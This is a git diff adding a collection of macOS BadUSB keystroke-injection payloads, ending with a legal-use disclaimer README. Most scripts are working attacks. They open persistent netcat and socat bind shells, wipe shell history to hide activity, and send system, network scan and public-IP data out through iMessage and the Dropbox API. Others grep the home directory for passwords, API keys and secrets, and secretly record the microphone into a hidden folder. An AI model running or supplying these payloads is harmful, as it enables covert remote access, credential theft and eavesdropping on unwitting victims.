00000000..2eb7b4ca --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/GuardianForge.txt @@ -0,0 +1,39 @@ +REM Script for System Execution Testing +REM This script is designed to test system execution capabilities and security settings on macOS. +REM It performs a series of controlled executions to assess the system's behavior and identify any vulnerabilities. + +REM You can replace with th path of your flipper to save the data dump + + + + +REM Author: Narsty +REM Title: GuardianForge +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING csrutil status > ~/Desktop/security_info.txt && sleep 2 +ENTER +DELAY 2000 +STRING spctl --status >> ~/Desktop/security_info.txt && sleep 2 +ENTER +DELAY 2000 +STRING codesign -dv --verbose=4 /bin/bash >> ~/Desktop/security_info.txt && sleep 2 +ENTER +DELAY 2000 +STRING ps aux | grep -v "root\|_" >> ~/Desktop/security_info.txt && sleep 2 +ENTER +DELAY 2000 +STRING lsof -i >> ~/Desktop/security_info.txt && sleep 2 +ENTER + diff --git a/BadUSB/MacOS-narstybits/RECON/Infinite Reverse Shell.txt b/BadUSB/MacOS-narstybits/RECON/Infinite Reverse Shell.txt new file mode 100644 index 00000000..dbda022f --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Infinite Reverse Shell.txt @@ -0,0 +1,53 @@ +REM This script installs netcat using home-brew (can adjust delay) +REM Sets up a continuous loop using netcat to establish a connection +REM and execute a bash shell every 180 seconds. + + +REM Now on your separate computer in your terminal Run the command 'nc 53000' +REM replace '' with the IP address of the target computer. +REM I've noticed that NC does not respond if you copy and paste so please type the I.P. out! +REM If the connection is successful, you should now have a remote shell session on the remote computer. + +REM To kill the listening port (53000 in this case) use the command below +REM killall nc + + +REM Requirements: install netcat on both the remote target and your computer 'brew install netcat' +REM Requirements: Remote computer's IP address or hostname + +REM Title: Infinite Reverse Shell.txt +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING brew install netcat +DELAY 500 +ENTER +DELAY 20000 +STRING nohup bash -c 'while true; do nc -l -p 53000 -vvv -e /bin/bash; sleep 180; done' & +DELAY 500 +ENTER +DELAY 500 +CTRL d +DELAY 500 +GUI w diff --git a/BadUSB/MacOS-narstybits/RECON/Info Infiltrator to Iphone.txt b/BadUSB/MacOS-narstybits/RECON/Info Infiltrator to Iphone.txt new file mode 100644 index 00000000..5e78507a --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Info Infiltrator to Iphone.txt @@ -0,0 +1,42 @@ +REM This script does a Port scan using the targets I.P. +REM then it sends the information from the scan to your phone. +REM Shoutout to matthewkayne and 0iphor13 for the Phone code + +REM Replace "Phone Number HERE" with your phone number to receive MacOs System information + +REM Title: InfoInfiltrator +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING x=$(system_profiler SPHardwareDataType SPSoftwareDataType); osascript -e 'tell application "Messages" to send "'$x'" to buddy "Phone Number HERE"' +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 2000 +STRING CLEAR +DELAY 500 +ENTER +DELAY 500 +GUI W diff --git a/BadUSB/MacOS-narstybits/RECON/Network Recon Plus.txt b/BadUSB/MacOS-narstybits/RECON/Network Recon Plus.txt new file mode 100644 index 00000000..c1e1b9e4 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Network Recon Plus.txt @@ -0,0 +1,29 @@ +REM 'networksetup -listallhardwareports' This command lists all the hardware ports/interfaces on your Mac, such as Wi-Fi, Ethernet, Bluetooth, etc. +REM 'ifconfig' This command displays the network interface configuration and status information. +REM ;arp -a' This command shows the Address Resolution Protocol (ARP) cache table. +REM It displays the mappings between IP addresses and MAC addresses of devices on your local network. + +REM Title: Network Recon + +REM Author: Narsty +REM Version: 1.0 +REM Target: MacOs +REM Category: Recon + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING networksetup -listallhardwareports +ENTER +DELAY 1000 +STRING ifconfig +ENTER +DELAY 1000 +STRING arp -a +ENTER + + diff --git a/BadUSB/MacOS-narstybits/RECON/Network Recon to Dropbox.txt b/BadUSB/MacOS-narstybits/RECON/Network Recon to Dropbox.txt new file mode 100644 index 00000000..6ab75128 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Network Recon to Dropbox.txt @@ -0,0 +1,49 @@ +REM Network Recon and Cloud Sync Automation +REM This script gathers network information from a macOS system +REM then uploads it to Dropbox for easy synchronization and analysis. +REM Replace "" with your actual API access token. line 25 + +REM Title: Network Recon to Dropbox +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING osascript -e 'do shell script "networksetup -listallhardwareports > \"$HOME/Desktop/network_interfaces.txt\" && ipconfig getpacket en0 >> \"$HOME/Desktop/network_interfaces.txt\""' +DELAY 1000 +ENTER +DELAY 500 +STRING curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/Backup/network_interfaces.txt\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @"$HOME/Desktop/network_interfaces.txt" +DELAY 2000 +ENTER +DELAY 5000 +STRING rm -r ~/Desktop/network_interfaces.txt +DELAY 500 +ENTER +STRING clear +DELAY 500 +ENTER +GUI w +DELAY 500 +ENTER + + diff --git a/BadUSB/MacOS-narstybits/RECON/Network Reconnaissance.txt b/BadUSB/MacOS-narstybits/RECON/Network Reconnaissance.txt new file mode 100644 index 00000000..0d71a65d --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Network Reconnaissance.txt @@ -0,0 +1,46 @@ +REM Use responsibly and with proper permissions. + +REM This script initiates a network reconnaissance by scanning for live hosts, +REM performing a port scan on live hosts, + + +REM Author: Narsty +REM Title: Network Reconnaissance +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + +REM Replace (15.151.298.31) with your targets I.P. address + +REM can insert multiple I.p.'s if needed + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING echo "Network Reconnaissance:" +STRING && echo "------------------------------" +STRING && echo "Scan Date: $(date)" +STRING && echo "------------------------------" +STRING && echo "Scanning for Live Hosts..." +STRING && echo "------------------------------" +STRING && ping -c 3 15.151.298.31 +STRING && ping -c 3 15.151.298.31 +REM Add more IP addresses to ping as needed +STRING && echo "------------------------------" +STRING && echo "Performing ARP Scan..." +STRING && echo "------------------------------" +STRING && arp -a +ENTER + + + + + + + diff --git a/BadUSB/MacOS-narstybits/RECON/Nmap Scan to Iphone.txt b/BadUSB/MacOS-narstybits/RECON/Nmap Scan to Iphone.txt new file mode 100644 index 00000000..3026b929 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Nmap Scan to Iphone.txt @@ -0,0 +1,42 @@ +REM This script does a Port scan using the targets I.P. +REM then it sends the information from the scan to your phone. +REM Shoutout to matthewkayne and 0iphor13 for the Phone code + +REM Replace "TARGET_IP" with I.P. of Target Mac +REM Replace "Phone Number HERE" with your phone number to receive Network Information + +REM Requirement: NMAP +REM can install using homebrew 'brew install nmap' + +REM Title: Nmap Scan to Iphone +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING x=$(nmap -p 1-1000 -T4 -v TARGET_IP); osascript -e 'tell application "Messages" to send "'$x'" to buddy "Phone Number HERE"' +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 2000 +GUI W diff --git a/BadUSB/MacOS-narstybits/RECON/Public I.P. Finder to Dropbox.txt b/BadUSB/MacOS-narstybits/RECON/Public I.P. Finder to Dropbox.txt new file mode 100644 index 00000000..089a5a06 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Public I.P. Finder to Dropbox.txt @@ -0,0 +1,68 @@ +REM Description: Uses Mac Terminals config.me command to do a PUBLIC I.P. lookup +REM Saves the data to a folder on the desktop +REM Then proceeds to upload the I.P. data to your API dropbox +REM removes the folder on the desktop and closes the terminal +REM Replace with your actual Dropbox API access token + + + +REM Title: Public I.P. Finder to Dropbox +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 2000 +STRING public_ip=$(curl -s ifconfig.me); +DELAY 500 +ENTER +DELAY 3000 +STRING mkdir ~/Desktop/"Public I.P. Data" && echo "Your TARGETS IP address is: $public_ip" > ~/Desktop/"Public I.P. Data"/public_ip.txt +DELAY 1000 +ENTER +DELAY 500 +STRING echo 'cd ~/Desktop/"Public I.P. Data" && zip -r backup.zip . && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/Backup/backup.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @backup.zip' > upload.sh +DELAY 2000 +ENTER +DELAY 500 +STRING chmod +x upload.sh +ENTER +DELAY 500 +STRING nohup ./upload.sh >/dev/null 2>&1 & +DELAY 500 +ENTER +DELAY 1000 +STRING rm upload.sh +DELAY 500 +ENTER +DELAY 500 +STRING rm -rf ~/Desktop/"Public I.P. Data" +DELAY 500 +ENTER +DELAY 500 +STRING CLEAR +DELAY 500 +ENTER +DELAY 500 +GUI w +DELAY 500 +ENTER diff --git a/BadUSB/MacOS-narstybits/RECON/Public I.P. Finder.txt b/BadUSB/MacOS-narstybits/RECON/Public I.P. Finder.txt new file mode 100644 index 00000000..29b6659c --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Public I.P. Finder.txt @@ -0,0 +1,29 @@ +REM Description: Uses Mac Terminals config.me command to do a PUBLIC I.P. lookup +REM displays the results in a pop up window +REM & Saves the data to a folder on the desktop +REM Folder is named "Public I.P. Data" + + +REM Title: Public I.P. Finder +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +STRING curl -s ifconfig.me; echo +DELAY 500 +ENTER +DELAY 500 +STRING public_ip=$(curl -s ifconfig.me); osascript -e "tell app \"System Events\" to display dialog \"I FOUND YOU: $public_ip\" with title \"Public IP Address\"" +DELAY 500 +STRING mkdir ~/Desktop/"Public I.P. Data" && echo "Your TARGETS IP address is: $public_ip" > ~/Desktop/"Public I.P. Data"/public_ip.txt +DELAY 500 +ENTER + diff --git a/BadUSB/MacOS-narstybits/RECON/Public I.P. to Iphone.txt b/BadUSB/MacOS-narstybits/RECON/Public I.P. to Iphone.txt new file mode 100644 index 00000000..b05b11c7 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Public I.P. to Iphone.txt @@ -0,0 +1,37 @@ +REM This script uses Mac Terminals ifconfig.me command to do a PUBLIC I.P. lookup +REM Then sends the I.p. to your phone via text message +REM Replace 'ENTER PHONE NUMBER HERE' with your actual Phone number +REM Shoutout to matthewkayne and 0iphor13 for the Phone code + + +REM Title: Public I.P. to Iphone +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING x=$(curl -s ifconfig.me/ip); osascript -e 'tell application "Messages" to send "'$x'" to buddy "ENTER PHONE NUMBER HERE"' +DELAY 500 +ENTER +DELAY 4000 +STRING CLEAR +DELAY 250 +GUI w diff --git a/BadUSB/MacOS-narstybits/RECON/Reverse Shell.txt b/BadUSB/MacOS-narstybits/RECON/Reverse Shell.txt new file mode 100644 index 00000000..de9a76bc --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Reverse Shell.txt @@ -0,0 +1,62 @@ +REM installs netcat using home-brew (can adjust delay) +REM Runs the command nohup nc -l -p 53000 -vvv -e /bin/bash to start a netcat listener on port 53000 +REM clears the terminal +REM Gui m minimizes the terminal window + + + +REM Now on your separate computer in your terminal Run the command 'nc 53000' +REM replace '' with the IP address of the target computer. +REM I've noticed that NC does not respond if you copy and paste so please type the I.P. out! +REM If the connection is successful, you should now have a remote shell session on the remote computer. + +REM To kill the listening port (53000 in this case) +REM you can use the kill command followed by the process ID (PID#) +REM to find the PID use command 'ps -ef | grep "nc -lvp 53000"' +REM Once you have the PID # run the command 'kill ' + + +REM to check if the port is closed +REM on the target computer run the command 'netstat -tuln | grep 53000' +REM If the listening port is closed, there should be no output or listing for port 53000. + + +REM Requirements: install netcat on both the remote target and your computer 'brew install netcat' +REM Requirements: Remote computer's IP address or hostname + +REM Title: Reverse Shell +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING brew install netcat +DELAY 250 +ENTER +DELAY 15000 +STRING nohup nc -l -p 53000 -vvv -e /bin/bash & +ENTER +DELAY 500 +STRING clear +ENTER +DELAY 1000 +GUI w \ No newline at end of file diff --git a/BadUSB/MacOS-narstybits/RECON/SentinelStrike.txt b/BadUSB/MacOS-narstybits/RECON/SentinelStrike.txt new file mode 100644 index 00000000..e6eb2cf7 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/SentinelStrike.txt @@ -0,0 +1,82 @@ +REM macOS Security Testing and Reconnaissance Duckyscript (Local System) +REM Unveiling the Depths of macOS Security +REM Comprehensive Testing and Advanced Reconnaissance Capabilities +REM This Script pulls just about everything you would need to know about a target MAC + +REM Author: Narsty +REM Title: SentinelStrike +REM Target: MacOS +REM Version: 1.0 +REM Category: RECON + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 500 +ENTER +DELAY 500 +STRING clear +ENTER +DELAY 500 +STRING echo "Starting local system security testing and reconnaissance..." +ENTER +DELAY 1000 + +REM Gather System Information +STRING echo "----- System Information -----" +ENTER +STRING system_profiler SPHardwareDataType SPSoftwareDataType | grep -E "Model Identifier|Processor Name|Memory|Serial Number|OS Version" | sed 's/^\s*//' +ENTER +DELAY 1000 + +REM Check for Suspicious Processes +STRING echo "----- Suspicious Processes -----" +ENTER +STRING ps aux | grep -E "root|admin" | grep -v grep | awk '{print $2, $11}' +ENTER +DELAY 1000 + +REM List Startup Items +STRING echo "----- Startup Items -----" +ENTER +STRING ls -la /Library/LaunchAgents /Library/LaunchDaemons ~/Library/LaunchAgents +ENTER +DELAY 1000 + +REM Check User Accounts +STRING echo "----- User Accounts -----" +ENTER +STRING dscl . -list /Users | grep -v '_' +ENTER +DELAY 1000 + +REM Find Sensitive Files +STRING echo "----- Sensitive Files -----" +ENTER +STRING find ~ -type f \( -iname "*.key" -o -iname "*.pem" -o -iname "*.rsa" \) 2>/dev/null +ENTER +DELAY 1000 + +REM Search for Sensitive Information +STRING echo "----- Sensitive Information -----" +ENTER +STRING grep -r -i -I --include='*.txt' --include='*.doc*' --include='*.xls*' --include='*.csv' --include='*.json' --include='*.xml' --include='*.conf' --include='*.config' --include='*.properties' --include='*.ini' --include='*.env' --exclude-dir='.git' --exclude-dir='node_modules' "password\|username\|apikey\|secret" ~ 2>/dev/null +ENTER +DELAY 1000 + +REM Check for Unsecured Files and Directories +STRING echo "----- Unsecured Files and Directories -----" +ENTER +STRING find ~ -type d \( -iname "public" -o -iname "www" \) 2>/dev/null +ENTER +DELAY 1000 + +REM Finished +STRING echo "----- Security testing and reconnaissance completed! -----" +ENTER + + + + diff --git a/BadUSB/MacOS-narstybits/RECON/SocatShell.txt b/BadUSB/MacOS-narstybits/RECON/SocatShell.txt new file mode 100644 index 00000000..5361c530 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/SocatShell.txt @@ -0,0 +1,47 @@ +REM This script sets up a TCP listener using socat for remote shell access. +REM Proceeds to clear the terminal and minimize the window for stealth. +REM It listens on the specified port (6300) + + +REM Once this script is executed there will be an open listener on port 6300 +REM you will be able to use the command 'socat STDIN TCP::6300' +REM this will establish a connection to the remote computer on port 6300 +REM and you should be able to interact with the remote shell + +REM Requirement: i.p. of target MacOs and socat application +REM can install using homebrew 'brew install socat' + +REM Title: SocatShell +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +ENTER +DELAY 500 +STRING nohup socat TCP-LISTEN:6300 EXEC:/bin/bash &>/dev/null & +DELAY 2000 +ENTER +DELAY 500 +STRING clear +ENTER +DELAY 250 +GUI w + + diff --git a/BadUSB/MacOS-narstybits/RECON/StealthSeeker.txt b/BadUSB/MacOS-narstybits/RECON/StealthSeeker.txt new file mode 100644 index 00000000..15768469 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/StealthSeeker.txt @@ -0,0 +1,50 @@ +REM This script focuses on searching for common sensitive information +REM including passwords, secrets, API keys, and configuration files. +REM It performs a file search within specific file types and looks for specific patterns. +REM The output will display any matches found in the search process. + +REM Author: Narsty +REM Title: StealthSeeker +REM Target: MacOS +REM Version: 1.0 +REM Category: RECON + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 500 +ENTER +DELAY 500 +STRING clear +ENTER +DELAY 500 +STRING echo "Initiating macOS sensitive information search..." +ENTER +DELAY 1000 + +REM Search for Passwords and Secrets +STRING echo "----- Passwords and Secrets -----" +ENTER +STRING grep -r -i -I --include='*.txt' --include='*.doc*' --include='*.xls*' --include='*.csv' --include='*.json' --exclude-dir='.git' --exclude-dir='node_modules' "password\|secret\|apikey\|taxes\|passport" ~ 2>/dev/null +ENTER +DELAY 1000 + +REM Search for Configuration Files +STRING echo "----- Configuration Files -----" +ENTER +STRING find / -type f \( -iname "*.conf" -o -iname "*.config" -o -iname "*.properties" -o -iname "*.ini" \) 2>/dev/null | xargs grep -E "username|password|apikey|secret" 2>/dev/null +ENTER +DELAY 1000 + +REM Finished +STRING echo "----- macOS sensitive information search completed! -----" +ENTER + + + + + + diff --git a/BadUSB/MacOS-narstybits/RECON/SysNet Info.txt b/BadUSB/MacOS-narstybits/RECON/SysNet Info.txt new file mode 100644 index 00000000..ef03e0fb --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/SysNet Info.txt @@ -0,0 +1,21 @@ +REM User Information: Includes the username, home directory, and user ID. +REM System Information: Displays details about the operating system. +REM Network Information: Shows network interface information IP address. +REM File and Directory Permissions: Provides permissions and ownership details of files and directories. + +REM Author: Narsty +REM Title: SysNet Info +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 1000 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING echo "User Information:" && echo "Username: $(whoami)" && echo "Home Directory: $HOME" && echo "User ID: $(id -u)" && echo && echo "System Information:" && uname -a && echo && echo "Network Information:" && ifconfig && echo && echo "File and Directory Permissions:" && ls -l + diff --git a/BadUSB/MacOS-narstybits/RECON/Voice Logger.txt b/BadUSB/MacOS-narstybits/RECON/Voice Logger.txt new file mode 100644 index 00000000..9f89b1d9 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Voice Logger.txt @@ -0,0 +1,61 @@ +REM Creates a hidden folder named .phantom_audio in the home directory. +REM Writes a Python script (record.py) that uses the sox utility +REM to record audio from the microphone and save it as a .mp3 file. + +REM Once executed, the audio recording will start and continue until manually stopped +REM You can stop the audio recording by finding the PID and using 'kill pid#' +REM The recording is saved in the .phantom_audio directory under the home directory + +REM To access the audio file easily, you can use the following steps: +REM Open a new Finder window. Go to the "Go" menu in the menu bar and select "Go to Folder" +REM enter "~/.phantom_audio" and click the "Go" button. +REM navigate to the .phantom_audio folder where you can find the "Secret audio.mp3" file. + +REM To delete the hidden folder use command 'rm -r ~/.phantom_audio' + +REM Requirements: SOX you can install through homebrew 'brew install sox' + +REM Author: Narsty +REM Title: Phantom Audio Capturer +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 1000 +STRING screen -dm bash -c "nohup python3 record.py &" +DELAY 200 +ENTER +DELAY 500 +STRING tccutil reset Microphone com.apple.Terminal +DELAY 500 +ENTER +STRING mkdir -p ~/.phantom_audio && cd ~/.phantom_audio +DELAY 500 +ENTER +DELAY 500 +STRING echo 'import os\nimport subprocess\nimport datetime\n\nfilename = "Secret audio.mp3"\ncmd = f"sox -d -C 128 -r 44100 \"{filename}\""\nsubprocess.Popen(cmd, shell=True)' > record.py +DELAY 1000 +ENTER +DELAY 500 +STRING nohup python3 record.py & +ENTER +DELAY 250 +GUI w diff --git a/BadUSB/MacOS-narstybits/RECON/Web Scraper.txt b/BadUSB/MacOS-narstybits/RECON/Web Scraper.txt new file mode 100644 index 00000000..15217c54 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Web Scraper.txt @@ -0,0 +1,45 @@ +REM Web Scraping and Output to Desktop. +REM This script performs web scraping on a target website and saves the extracted data to a text file on the desktop. +REM Make sure to replace the target website URL and adjust the delay timings as needed for optimal performance. + + +REM Please note that web scraping may have legal and ethical implications, +REM script should only be performed on websites you have permission to access and scrape data from. +REM Replace 'https://www.example.com' with the target website URL. + + + +REM Author: Narsty +REM Title: Web Scraper +REM Version: 1.0 +REM Target: MacOs +REM Category: Recon + + +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING cd ~/Desktop +DELAY 500 +ENTER +DELAY 500 +STRING touch output.txt +DELAY 500 +ENTER +DELAY 500 +STRING curl -s https://www.example.com > output.txt +DELAY 1000 +ENTER +DELAY 500 +STRING open -e output.txt +DELAY 1000 +ENTER + + + + + diff --git a/BadUSB/MacOS-narstybits/Warning Readme.md b/BadUSB/MacOS-narstybits/Warning Readme.md new file mode 100644 index 00000000..6466391d --- /dev/null +++ b/BadUSB/MacOS-narstybits/Warning Readme.md @@ -0,0 +1,48 @@ + + + + + + + + + + + + + + + +
+ Top Image +
+
+

Caution: Read before proceeding

+
+
+

Usage Limitations: + Coding

+

The scripts and codes provided by Narsty are intended solely for the purpose of testing security protocols and penetration testing. They should be used only in compliance with all applicable laws and regulations.

+
+
+

Authorization Required: + Coding

+

It is essential to obtain proper authorization and consent before using any scripts or codes on computer systems or networks (EVEN PRANKS). Ensure that you have explicit permission from the owner or authorized administrator of the system(s) you intend to test or evaluate.

+
+
+

Responsible Use: + Coding

+

Exercise utmost responsibility while utilizing these scripts and codes. Any unauthorized or malicious activities are strictly prohibited. Engaging in unauthorized access, tampering with data, or compromising the privacy of individuals without consent is illegal and unethical.

+
+
+

Legal Compliance: + Coding

+

Familiarize yourself with the laws, regulations, and guidelines applicable in your jurisdiction regarding computer security, ethical hacking, and information privacy. Ensure compliance with all relevant legal obligations.

+
+
+

Accountability: + Coding

+

By using Narsty's scripts and codes, you acknowledge that you are solely responsible for any actions or consequences resulting from their use. Narsty cannot be held liable for any misuse, damage, or legal ramifications arising from unauthorized or unethical activities.

+
+ +